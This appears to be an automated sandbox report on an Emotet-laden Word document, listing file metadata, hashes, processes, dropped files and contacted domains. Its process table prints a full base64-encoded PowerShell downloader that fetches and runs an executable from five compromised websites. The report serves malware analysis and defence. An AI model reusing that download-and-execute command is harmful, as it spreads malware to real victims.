File name: | Messaggio.doc |
Full analysis: | https://app.any.run/tasks/10f90647-4c02-4f08-9f96-edd1755ca178 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 14, 2019, 16:38:47 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Credit Card Account, Subject: seize, Author: Helmer Steuber, Keywords: vertical, Comments: overriding, Template: Normal.dotm, Last Saved By: Jaiden Kling, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 15:00:00 2019, Last Saved Time/Date: Mon Oct 14 15:00:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 172, Security: 0 |
MD5: | EE9BA912324E6D1FE7A8184491A5A29B |
SHA1: | A5912510CE1FEB072158AEF41E0EF5A53AD5B6DB |
SHA256: | 9AE7F9CEE0F7FE878D1202D43474A2C4B743E885D0CB6BB69FC3AE866C29D51A |
SSDEEP: | 3072:1PHuhoEKgdzSrGsKyIwLx3noRaWOcIBOaOhi1o5lE8COrg12bKDmwf9EJZ:1PHuhoEKUzSHnLx3noAWOJQaOhi1wKP |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Credit Card Account |
---|---|
Subject: | seize |
Author: | Helmer Steuber |
Keywords: | vertical |
Comments: | overriding |
Template: | Normal.dotm |
LastModifiedBy: | Jaiden Kling |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:10:14 14:00:00 |
ModifyDate: | 2019:10:14 14:00:00 |
Pages: | 1 |
Words: | 30 |
Characters: | 172 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Rempel Group |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 201 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Grady |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2384 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Messaggio.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3872 | powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABhAGUAZgA3ADYANQA1ADEAMwAxADAAZQA0ADMAPQAnAGEAMAB4AGMAYQAxAGMAYQBkAGYAOQA2ADgAMAAyADIAJwA7ACQAYQAwAHgAMQBkADMAOABhAGMAMgA4AGQAZgBjAGMANAA2ACAAPQAgACcANAA3ADIAJwA7ACQAYQAwAHgAZABjADQAYwAxADIAYQA3AGUAMwA5ADgAPQAnAGEAMAB4AGUAYQA4ADUAOABhADYAMAA3ADMAZABlADUAMQBkACcAOwAkAGEAMAB4ADEAMQAzADcAYwBlADYAYgBkAGYAMAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYQAwAHgAMQBkADMAOABhAGMAMgA4AGQAZgBjAGMANAA2ACsAJwAuAGUAeABlACcAOwAkAGEAMAB4AGYAZQA0ADMAMgAwADcANAA5ADIAMwAzADkAMQA9ACcAYQAwAHgAMgA4AGQANwBjADkAYQA2AGQANAAwAGYAJwA7ACQAYQAwAHgAMAAyAGMAYgA1AGQAMgBiADEAOABjADYAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBlAEIAQwBsAGkAZQBuAHQAOwAkAGEAMAB4ADEANQA4ADcAOQAzADQAMAAxAGIAZAAyADQAOAA9ACcAaAB0AHQAcAA6AC8ALwBhAG4AZAByAGUAdwBzAGkAYwBlAGwAbwBmAGYALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGMAagAyAGQAMAAwADAAOQAvACoAaAB0AHQAcAA6AC8ALwBiAGUAYQBuAHMAbQBlAGQAaQBhAC4AYwBvAG0ALwB6AGUAdQBzADEANgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHQAdQBiAGEAdwA1AHkAMwA1AC8AKgBoAHQAdABwADoALwAvAGEAYgBoAGkAZABoAGEAbQBtAGEAcwBvAGMAaQBlAHQAeQAuAGMAbwBtAC8AdwBwAC0AcwBuAGEAcABzAGgAbwB0AHMALwBpAGgAMwB2AHoAZABjADkALwAqAGgAdAB0AHAAOgAvAC8AcABjAGYAMAA4AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAAyADQANAA3AC8AKgBoAHQAdABwADoALwAvAGEAYwBxAHUAaQByAGkAbgBnAC0AdABhAGwAZQBuAHQALgBjAG8AbQAvAGQAcABhAGoALwAwADUAZwBkADUANwA1AC8AJwAuACIAcwBwAGAATABpAFQAIgAoACcAKgAnACkAOwAkAGEAMAB4ADgAOQA5ADAAYQA5AGQANABiAGEAMQAwAGUANwA9ACcAYQAwAHgAZQAxADgAMAAzADgAZgBjADYANQAzAGQANQAnADsAZgBvAHIAZQBhAGMAaAAoACQAYQAwAHgAMABmADcAYgA2AGQAZQA3ADUANQAgAGkAbgAgACQAYQAwAHgAMQA1ADgANwA5ADMANAAwADEAYgBkADIANAA4ACkAewB0AHIAeQB7ACQAYQAwAHgAMAAyAGMAYgA1AGQAMgBiADEAOABjADYALgAiAGQATwB3AE4AbABgAG8AQQBgAGQAYABGAGkAbABlACIAKAAkAGEAMAB4ADAAZgA3AGIANgBkAGUANwA1ADUALAAgACQAYQAwAHgAMQAxADMANwBjAGUANgBiAGQAZgAwACkAOwAkAGEAMAB4ADgAMQBkADkAOQBhADgANwBiADEAZAA9ACcAYQAwAHgANgBiAGIAMwAyADAANQBlADcAMwA4ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQAYQAwAHgAMQAxADMANwBjAGUANgBiAGQAZgAwACkALgAiAEwARQBOAGAARwBUAEgAIgAgAC0AZwBlACAAMgAxADMANwAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABhAGAAUgBUACIAKAAkAGEAMAB4ADEAMQAzADcAYwBlADYAYgBkAGYAMAApADsAJABhADAAeABjADkANAA1AGYAZQBlAGEAOQBmAD0AJwBhADAAeAA1AGEAYwBmADUAYwBiADYAYQBhACcAOwBiAHIAZQBhAGsAOwAkAGEAMAB4ADAAZQA0ADkAZgBlAGYAMwA1ADIAPQAnAGEAMAB4ADkAZABjAGEANQA5AGUAZgA0AGEANAAzADMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYQAwAHgAZgA5ADUANAA5ADYAYQA4ADEAYwA0ADkANAA9ACcAYQAwAHgANgBkADcAZQAyADgAZQAwAGEAMQA2ACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2384 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA93B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3872 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SN6CEBVA9UTYJS8BXNFG.temp | — | |
MD5:— | SHA256:— | |||
2384 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:1679A07D075DA050C40F11BE71AA16AE | SHA256:42155E96DD417D2DF393FCE58AF6DE9F1AC14A99EEC78EB6749205CE415F54EA | |||
2384 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C11FAFA0.wmf | wmf | |
MD5:EBA7F644080A142B312957C48F4C7C56 | SHA256:255CE0DE65627DC752820B0913FCADA1606640DE1F9DAB010AEA9C6F3FD25BB7 | |||
2384 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D34AD1EBE1C04CA6C8E8CB5E45D81DAB | SHA256:DB22294A4F4656A43B765D3DD0099A5D4034D1DFE87D83707A24DC0A6439AAB6 | |||
3872 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b9d5.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2384 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EEE0CD5B.wmf | wmf | |
MD5:E66D09E3921F9101CC653DDA930BB93E | SHA256:EDBB9220D4B016E5867AB13759AC841BC5A057046A8EAC0A4ED23E4420898E0C | |||
2384 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Messaggio.doc.LNK | lnk | |
MD5:A306119CD5CF3AF288EE64ACF9F16125 | SHA256:DA05B8A94F94DB944950E52A2E8AE3CB448E66308C48D9B93CC9DC1C73F59463 | |||
2384 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC026CA9.wmf | wmf | |
MD5:788FCF837DE9B3B079C8B217F2103747 | SHA256:3C378200E1F7284F2C37E977A801976859C90BA209D0127AF907B5EDE3CED642 | |||
2384 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:4ABBD7AAEE806A949B5CF8F97544D8DB | SHA256:01D4493C1F7B99FC7EBCE2DF11F145D9DF0CBD4D9DD1182126657A3799108E22 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3872 | powershell.exe | GET | 404 | 173.236.169.124:80 | http://abhidhammasociety.com/wp-snapshots/ih3vzdc9/ | US | xml | 345 b | unknown |
3872 | powershell.exe | GET | 404 | 149.210.131.83:80 | http://beansmedia.com/zeus16/wp-includes/tubaw5y35/ | NL | xml | 345 b | suspicious |
3872 | powershell.exe | GET | 404 | 199.204.248.102:80 | http://andrewsiceloff.com/wp-admin/cj2d0009/ | US | xml | 345 b | suspicious |
3872 | powershell.exe | GET | 404 | 62.210.16.61:80 | http://pcf08.com/wp-content/02447/ | FR | xml | 345 b | malicious |
3872 | powershell.exe | GET | 404 | 166.62.28.141:80 | http://acquiring-talent.com/dpaj/05gd575/ | US | xml | 345 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3872 | powershell.exe | 199.204.248.102:80 | andrewsiceloff.com | CONTINENTAL BROADBAND PENNSYLVANIA, INC. | US | suspicious |
3872 | powershell.exe | 173.236.169.124:80 | abhidhammasociety.com | New Dream Network, LLC | US | unknown |
3872 | powershell.exe | 166.62.28.141:80 | acquiring-talent.com | GoDaddy.com, LLC | US | malicious |
3872 | powershell.exe | 149.210.131.83:80 | beansmedia.com | Transip B.V. | NL | suspicious |
3872 | powershell.exe | 62.210.16.61:80 | pcf08.com | Online S.a.s. | FR | malicious |
Domain | IP | Reputation |
---|---|---|
andrewsiceloff.com |
| suspicious |
beansmedia.com |
| suspicious |
abhidhammasociety.com |
| unknown |
pcf08.com |
| malicious |
acquiring-talent.com |
| malicious |